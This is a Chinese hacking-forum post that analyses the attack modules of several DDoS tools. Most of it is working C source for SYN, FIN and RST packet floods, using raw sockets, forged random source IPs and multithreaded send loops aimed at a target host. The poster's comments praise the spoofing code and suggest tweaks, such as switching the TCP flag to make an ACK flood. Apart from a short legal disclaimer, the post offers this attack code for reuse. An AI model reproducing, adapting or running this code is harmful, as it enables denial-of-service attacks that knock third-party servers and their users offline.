HanDs
管理员

[Visual Studio文章] 攻击模块分析-SYN篇 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

TcpHeader.th_flag = 2; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG //SYN 标志
我们可以不可以改变这个值 2是SYN攻击     改成16变成ACK攻击
这样可以吗

我刚才还在想这个问题   暴风DDOSVIP2010-225源代码.h   源码里就已经写到了呵呵爽啊
暴风DDOSVIP2010-225源代码.h   SYN(流量) 我觉得写得非常好真的个人看法

QQ:316118740


//=================================================================================

冷风的.h

typedef struct tcphdr   //定义TCP首部
{
USHORT th_sport;   //16位源端口
USHORT th_dport;   //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度+6位保留字中的4位
unsigned char th_flag; //2位保留字+6位标志位
USHORT th_win;    //16位窗口大小
USHORT th_sum;    //16位校验和
USHORT th_urp;    //16位紧急数据偏移量
}TCP_HEADER;

typedef struct _iphdr    //ip头
{
unsigned char h_verlen;   //4位首部长度+4位IP版本号
unsigned char tos;    //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident;   //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl;    //8位生存时间TTL
unsigned char proto;   //8位协议号(TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP;   //32位源IP地址
unsigned int destIP;   //32位目的IP地址
}IP_HEADER;

typedef struct tsd_hdr //定义TCP伪首部
{
unsigned long saddr;     //源地址
unsigned long daddr;     //目的地址
char           mbz;
char           ptcl;     //协议类型
unsigned short tcpl;    //TCP长度
}PSD_HEADER;


//计算校验和
USHORT checksum(USHORT *buffer,int size)
{
unsigned long cksum=0;
while (size>1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if (size)
{
cksum+=*(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);

}

/*********************SYN FLOOD**************************/
unsigned long CALLBACK SynFloodFunction(LPVOID dParam)   //SYN攻击
{
    SOCKET             sendSocket; //套接字
    SOCKADDR_IN        Sin;   //IP信息结构
    IP_HEADER          ipHeader;
    TCP_HEADER         tcpHeader;
    PSD_HEADER         psdHeader;
    char               szSendBuf[1024] = "";

    if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)   //创建一个与指定传送服务提供者捆绑的套接口
    {                                                                                            //INVALID_SOCKET发生错误
        printf("Socket Setup Error...\n"); //插口设定错误…
        return 0;
    }
BOOL flag=1;
    if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR)       //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
    {
        printf("Setsockopt IP_HDRINCL Error...\n"); //Setsockopt IP_HDRINCL错误…
        return 0;
    }

    int timeout = 3000;
    if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR)      //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
    {
        printf("Setsockopt SO_SNDTIMEO Error...\n"); //Setsockopt SO_SNDTIMEO错误…
        return 0;
    }

Sin.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
Sin.sin_port=htons(DdosPort); //目标端口号(使用网络字节顺序)
Sin.sin_addr.S_un.S_addr=resolve(DdosUrl);   //目标IP地址

char         src_ip[20] = {0};

while(!StopDDosAttack)    //是否在攻击状态
    {
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); //格式化字符串 伪造IP
  
//填充IP首部
ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ipHeader.tos = 0;
ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader)); //16位总长度(字节)
ipHeader.ident = 1;   //16位标识
ipHeader.frag_and_flags = 0x40;   //3位标志位
ipHeader.ttl = 128;    //8位生存时间TTL
ipHeader.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
ipHeader.checksum = 0;   //16位IP首部校验和
ipHeader.sourceIP = inet_addr(src_ip); //伪IP 伪装自己的IP
ipHeader.destIP = Sin.sin_addr.s_addr; //目标地址

//填充TCP首部
tcpHeader.th_sport = htons( 12121 ); //源端口号
tcpHeader.th_dport = htons( DdosPort ); //目标端口
tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); //SYN序列号
tcpHeader.th_ack = 0;   //ACK序列号置为0
tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0); //TCP长度和保留位
tcpHeader.th_flag = 0x02; //SYN 标志      //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
tcpHeader.th_win = htons(512); //窗口大小
tcpHeader.th_sum = 0; //校验
tcpHeader.th_urp = 0; //紧急数据偏移量
  
//填充TCP伪首部(用于计算校验和,并不真正发送)
psdHeader.saddr = ipHeader.sourceIP; //伪IP 伪装自己的IP
psdHeader.daddr = ipHeader.destIP; //目标地址
psdHeader.mbz = 0;
psdHeader.ptcl = IPPROTO_TCP; //协议类型
psdHeader.tcpl = htons(sizeof(tcpHeader));   //TCP长度

//计算TCP校验和
        //计算TCP校验和,计算校验和时需要包括TCP pseudo header
memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );

   //计算IP检验和
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 );   //内存空间初始化
ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );

memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); //填充发送缓冲区
memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); //填充发送缓冲区

for(int a=0;a<100;a++) //每发送100个报文输出一个标示符.
{
   sendto(sendSocket, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin)); //发送TCP报文
   //为什么没有写法返回状态呢
   printf(".");
}
Sleep(100); //暂停(毫秒)
}
    return 0;
}


//=================================================================================

暴风DDOSVIP2010-225源代码.h

//Fin(流量) 伪造RST协议(流量)   攻击模块为什么没有像 SYN(流量) 那样写呢 SYN(流量)写的真的很好

/*--------------------------------------IP与封报校验------------------------------------------*/
typedef struct _iphdr
{
unsigned char   h_verlen; //4位手部长度,和4位IP版本号
unsigned char   tos; //8位类型服务
unsigned short total_len; //16位总长度
unsigned short ident; //16位标志
unsigned short frag_and_flags; //类型
unsigned char   ttl; //8位生存时间
unsigned char   proto; //8位协议
unsigned short checksum; //ip首部效验和
unsigned int    sourceIP; //伪造IP地址或本机
unsigned int    destIP; //攻击的ip地址
}IP_HEADER, * PIP_HEADER;

/*--------------------------------------SYN data----------------------------------------------*/
typedef struct _tcphdr
{
unsigned short th_sport; //本机端口
unsigned short th_dport; //攻击的IP端口
unsigned int    th_seq; //32位序列号
unsigned int    th_ack; //32位确认号
unsigned char   th_lenres; //4位首部长度
unsigned char   th_flag; //6位标志位 ACK SYN and so on
unsigned short th_win; //16位窗口大小
unsigned short th_sum; //16位效验和
unsigned short th_urp; //16位紧急指针
}TCP_HEADER, * PTCP_HEADER;

typedef struct tsd_hdr
{
unsigned long saddr; //本机地址或伪造地址
unsigned long daddr; //目标地址
char           mbz;
char           ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER;

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}


/*--------------------------------------------------------------------------------------*/
void finattack()   //Fin(流量)
{
srand((unsigned) time(NULL));
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);

SOCKET    SendSocket;
IP_HEADER    ip_header;
TCP_HEADER   tcp_header;
PSD_HEADER   psd_header;

char rawip[20]="192.168.1.244";
char SendBuff[100];

SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED );
if( SendSocket == INVALID_SOCKET )
return;

BOOL Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR )
return;

int Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )
return;

SOCKADDR_IN    Sin;
Sin.sin_family = AF_INET;
Sin.sin_port = tgtPort;
Sin.sin_addr.s_addr = inet_addr(tgtIP);


ip_header.h_verlen = (4<<4 | sizeof(ip_header)/sizeof(unsigned long));
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header));
ip_header.ident = 1;
ip_header.frag_and_flags = 0x40;
ip_header.ttl = rand()%256;
ip_header.proto = IPPROTO_TCP;
ip_header.checksum = 0;
ip_header.sourceIP = inet_addr(rawip);
ip_header.destIP = inet_addr(tgtIP);

tcp_header.th_sport = htons( rand()%60000 + 1 );
tcp_header.th_dport = htons( tgtPort );
tcp_header.th_seq = htonl( rand()%900000000 + 1 );
tcp_header.th_ack = 0;
tcp_header.th_lenres = (sizeof(tcp_header)/4<<4|0);
tcp_header.th_flag = 0; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG 这个地方不一样
tcp_header.th_win = htons(512);
tcp_header.th_sum = 0;
tcp_header.th_urp = 0;

psd_header.saddr = ip_header.sourceIP;
psd_header.daddr = ip_header.destIP;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(tcp_header));

memcpy(SendBuff,&psd_header,sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header));

memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header));
memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4);
ip_header.checksum=checksum((USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header));

memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header));


while (1)
{
if (StopFlag == 1)
{
   ExitThread(0);
   return;
}
for(int a=0;a<1000;a++)
   sendto(SendSocket, SendBuff, sizeof(ip_header) + sizeof(tcp_header), 0, (struct sockaddr *) &Sin, sizeof(Sin));
Sleep(SleepTime);
}
return;
}
/*--------------------------------------------------------------------------------------*/
void StartFIN(char ip[30],int port,int time,int xc) //Fin(流量)
{

if (inet_addr(ip)== INADDR_NONE)
{
   struct hostent *hp = NULL;
   if ((hp = gethostbyname(ip)) != NULL)
   {
    in_addr in;
    memcpy(&in, hp->h_addr, hp->h_length);
    strcpy(tgtIP,inet_ntoa(in));
   }
}
else
   strcpy(tgtIP,ip);


port=tgtPort;
time=timeout;

if (StopFlag == -1)
   return;

StopFlag=-1;

for(z=0;z<xc;z++)
{
   h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)finattack, NULL, 0, NULL);
}
if(timeout!=0)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
/*--------------------------------------------------------------------------------------*/
void rstattack()    //伪造RST协议(流量)
{
srand((unsigned) time(NULL));
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);

SOCKET    SendSocket;
IP_HEADER    ip_header;
TCP_HEADER   tcp_header;
PSD_HEADER   psd_header;

char rawip[20]="192.168.1.244";
char SendBuff[100];

SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED );
if( SendSocket == INVALID_SOCKET )
return;

BOOL Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR )
return;

int Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )
return;

SOCKADDR_IN    Sin;
Sin.sin_family = AF_INET;
Sin.sin_port = tgtPort;
Sin.sin_addr.s_addr = inet_addr(tgtIP);


ip_header.h_verlen = (4<<4 | sizeof(ip_header)/sizeof(unsigned long));
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header));
ip_header.ident = 1;
ip_header.frag_and_flags = 0x40;
ip_header.ttl = rand()%256;
ip_header.proto = IPPROTO_TCP;
ip_header.checksum = 0;
ip_header.sourceIP = inet_addr(rawip);
ip_header.destIP = inet_addr(tgtIP);

tcp_header.th_sport = htons( rand()%60000 + 1 );
tcp_header.th_dport = htons( tgtPort );
tcp_header.th_seq = htonl( rand()%900000000 + 1 );
tcp_header.th_ack = 0;
tcp_header.th_lenres = (sizeof(tcp_header)/4<<4|0);
tcp_header.th_flag = 4;   //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG 这个地方不一样
tcp_header.th_win = htons(512);
tcp_header.th_sum = 0;
tcp_header.th_urp = 0;

psd_header.saddr = ip_header.sourceIP;
psd_header.daddr = ip_header.destIP;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(tcp_header));

memcpy(SendBuff,&psd_header,sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header));

memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header));
memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4);
ip_header.checksum=checksum((USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header));

memcpy(SendBuff,&ip_header,sizeof(ip_header));
memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header));


while (1)
{
if (StopFlag == 1)
{
   ExitThread(0);
   return;
}
for(int a=0;a<10000;a++)
   sendto(SendSocket, SendBuff, sizeof(ip_header) + sizeof(tcp_header), 0, (struct sockaddr *) &Sin, sizeof(Sin));
Sleep(SleepTime);
}
return;
}
/*--------------------------------------------------------------------------------------*/
void StartRST(char ip[30],int port,int time,int xc) //伪造RST协议(流量)
{

if (inet_addr(ip)== INADDR_NONE)
{
   struct hostent *hp = NULL;
   if ((hp = gethostbyname(ip)) != NULL)
   {
    in_addr in;
    memcpy(&in, hp->h_addr, hp->h_length);
    strcpy(tgtIP,inet_ntoa(in));
   }
}
else
   strcpy(tgtIP,ip);


port=tgtPort;
time=timeout;

if (StopFlag == -1)
   return;

StopFlag=-1;

for(z=0;z<xc;z++)
{
   h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rstattack, NULL, 0, NULL);
}
if(timeout!=0)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
/*-------------------------------------------------------------------------------------------*/
void synattack()   //SYN(流量)
{
srand((unsigned) time(NULL));
WSADATA wsaData;    //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData); //确定SOCKET版本

SOCKET    SendSocket;
IP_HEADER    ip_header;
TCP_HEADER   tcp_header;
PSD_HEADER   psd_header;

char rawip[20]="192.168.1.244"; //默认伪IP
char SendBuff[100];

SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); //创建一个与指定传送服务提供者捆绑的套接口
if( SendSocket == INVALID_SOCKET )   //INVALID_SOCKET发生错误
return;

BOOL Flag = TRUE;
if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag)) == SOCKET_ERROR ) //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
return;

int Timeout = 5000;
if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout)) == SOCKET_ERROR )    //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
return;

SOCKADDR_IN    Sin;    //IP信息结构
Sin.sin_family = AF_INET;    //sin_family 地址家族(必须是AF_INET)
Sin.sin_port = tgtPort;   //目标端口号(使用网络字节顺序)
Sin.sin_addr.s_addr = inet_addr(tgtIP);   //目标IP地址


ip_header.h_verlen = (4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header));   //16位总长度(字节)
ip_header.ident = 1;    //16位标识
ip_header.frag_and_flags = 0x40;   //3位标志位
ip_header.ttl = rand()%256;   //8位生存时间TTL
ip_header.proto = IPPROTO_TCP;   //8位协议(TCP,UDP…)
ip_header.checksum = 0; //16位IP首部校验和
ip_header.sourceIP = inet_addr(rawip);   //伪IP 伪装自己的IP
ip_header.destIP = inet_addr(tgtIP); //目标地址

//填充TCP首部
tcp_header.th_sport = htons( rand()%60000 + 1 ); //源端口号 目标端口 随机产生呵呵很好很高很绝
tcp_header.th_dport = htons( tgtPort );   //目标端口
tcp_header.th_seq = htonl( rand()%900000000 + 1 );   //SYN序列号
tcp_header.th_ack = 0; //ACK序列号置为0
tcp_header.th_lenres = (sizeof(tcp_header)/4<<4|0); //TCP长度和保留位
tcp_header.th_flag = 2;   //SYN 标志    //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
tcp_header.th_win = htons(512);   //窗口大小
tcp_header.th_sum = 0;   //校验
tcp_header.th_urp = 0;   //紧急数据偏移量

//填充TCP伪首部(用于计算校验和,并不真正发送)
psd_header.saddr = ip_header.sourceIP;    //伪IP 伪装自己的IP
psd_header.daddr = ip_header.destIP; //目标地址
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;    //协议类型
psd_header.tcpl = htons(sizeof(tcp_header));    //TCP长度

while (1)
{
if (StopFlag == 1)   //判断攻击状态
{
   ExitThread(0);
   return;
}
for(int a=0;a<10240;a++)//发送10240个报文
{ //写的很好 伪IP 都在这个循环里 填充TCP上边已经做了 但是这个循环里又对随机动态信息进行了处理     写的很好太伟大了
   wsprintf(rawip, "%d.%d.%d.%d",rand()%250+1,rand()%250+1,rand()%250+1,rand()%250+1); //格式化字符串 伪造IP
   ip_header.checksum = 0;
   ip_header.ttl = rand()%256;   //8位生存时间TTL
   ip_header.sourceIP = inet_addr(rawip); //伪IP 伪装自己的IP

   tcp_header.th_sum = 0;   //校验
   tcp_header.th_sport = htons( rand()%60000 + 1 ); //源端口号 目标端口 随机产生呵呵很好很高很绝
   tcp_header.th_seq = htonl( rand()%900000000 + 1 );   //SYN序列号
   //应该把目标端口也加到这个里面


   psd_header.saddr = ip_header.sourceIP;   //伪IP 伪装自己的IP

   memcpy(SendBuff,&psd_header,sizeof(psd_header));
   memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
   tcp_header.th_sum=checksum((USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header));

   memcpy(SendBuff,&ip_header,sizeof(ip_header));
   memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header));
   memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4);
   ip_header.checksum=checksum((USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header));

   memcpy(SendBuff,&ip_header,sizeof(ip_header));   //填充发送缓冲区
   memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); //填充发送缓冲区

   sendto(SendSocket, SendBuff, sizeof(ip_header) + sizeof(tcp_header), 0, (struct sockaddr *) &Sin, sizeof(Sin)); //发送TCP报文
   //为什么没有写法返回状态呢
   //这里写个返回状态更好了
}
Sleep(SleepTime);
}
return;
}
/*--------------------------------------------------------------------------------------*/
void StartSYN(char ip[30],int port,int time,int xc)   //SYN(流量)
{

if (inet_addr(ip)== INADDR_NONE)
{
   struct hostent *hp = NULL;
   if ((hp = gethostbyname(ip)) != NULL)
   {
    in_addr in;
    memcpy(&in, hp->h_addr, hp->h_length);
    strcpy(tgtIP,inet_ntoa(in));
   }
}
else
   strcpy(tgtIP,ip);


port=tgtPort;
time=timeout;

if (StopFlag == -1)
   return;

StopFlag=-1;
for(z=0;z<xc;z++)
{
   h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)synattack, NULL, 0, NULL);
}
if(timeout!=0)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}

//=================================================================================

盘古DDOS优化版源码.h

///攻击函数
//SYN
void synflood()
{
BOOL flag=TRUE;
int time=5000;
char src_ip[20]="192.168.0.1";

WSAData wsadata; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2),&wsadata); //确定SOCKET版本

SOCKET synSock;
SOCKADDR_IN synaddr; //IP信息结构
IPHEADER ipheader;
TCPHEADER tcpheader;
TSDHEADER psdheader;

synSock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if(synSock==INVALID_SOCKET)    //INVALID_SOCKET发生错误
return;
if(setsockopt(synSock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)   //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
return;
if(setsockopt(synSock,SOL_SOCKET,SO_SNDTIMEO,(char*)&time,sizeof(time))==SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
return;

synaddr.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
synaddr.sin_port = htons(tgtport); //目标端口号(使用网络字节顺序)
synaddr.sin_addr.S_un.S_addr = inet_addr(tgtip); //目标IP地址

wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); //格式化字符串 伪造IP
//填充IP首部
ipheader.h_verlen = (4<<4 | sizeof(ipheader)/sizeof(unsigned long));   //高四位IP版本号,低四位首部长度
ipheader.tos = 0;
ipheader.total_len = htons(sizeof(ipheader)+sizeof(tcpheader));    //16位总长度(字节)
ipheader.ident = 1;   //16位标识
ipheader.frag_and_flags = 0; //3位标志位
ipheader.ttl = 128; //8位生存时间TTL
ipheader.proto = IPPROTO_TCP;   //8位协议(TCP,UDP…)
ipheader.checksum = 0; //16位IP首部校验和
ipheader.SourceIP = inet_addr(src_ip);   //伪IP 伪装自己的IP
ipheader.DestIP = inet_addr(tgtip);    //目标地址

//填充TCP首部
tcpheader.th_sport = htons(5444);//源端口号
tcpheader.th_dport = htons(tgtport);   //目标端口
tcpheader.th_seq = htonl(0x12345678);    //SYN序列号
tcpheader.th_ack = 0; //ACK序列号置为0
tcpheader.th_lenres = (sizeof(tcpheader)/4<<4|0);   //TCP长度和保留位
tcpheader.th_flag = 2; //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG //SYN 标志
tcpheader.th_win = htons(512); //窗口大小
tcpheader.th_sum = 0; //校验
tcpheader.th_urp = 0; //紧急数据偏移量

//填充TCP伪首部(用于计算校验和,并不真正发送)
psdheader.saddr = ipheader.SourceIP;    //伪IP 伪装自己的IP
psdheader.daddr = ipheader.DestIP;   //目标地址
psdheader.mbz = 0;
psdheader.ptcl = IPPROTO_TCP;   //协议类型
psdheader.tcpl = htons(sizeof(tcpheader));      //TCP长度

//计算校验和
char SendBuff[100]={0};
memcpy(SendBuff, &psdheader, sizeof(psdheader));
memcpy(SendBuff+sizeof(psdheader), &tcpheader, sizeof(tcpheader));
tcpheader.th_sum=checksum((USHORT *)SendBuff,sizeof(psdheader)+sizeof(tcpheader));

memcpy(SendBuff, &ipheader, sizeof(ipheader));   //填充发送缓冲区
memcpy(SendBuff+sizeof(ipheader), &tcpheader, sizeof(tcpheader));    //填充发送缓冲区

while(1)
{
if(Stop==1) //是否在攻击状态
{
   ExitThread(0);
   return;
}
for(int i=0;i<10000;i++)
   sendto(synSock,SendBuff,sizeof(ipheader)+sizeof(tcpheader),0,(struct sockaddr*)&synaddr,sizeof(synaddr));   //发送TCP报文
Sleep(20);
}
closesocket(synSock); //关闭SOCKET
WSACleanup(); //中止Windows Sockets DLL的使用
}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
攻击 模块 分析 - SY N
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复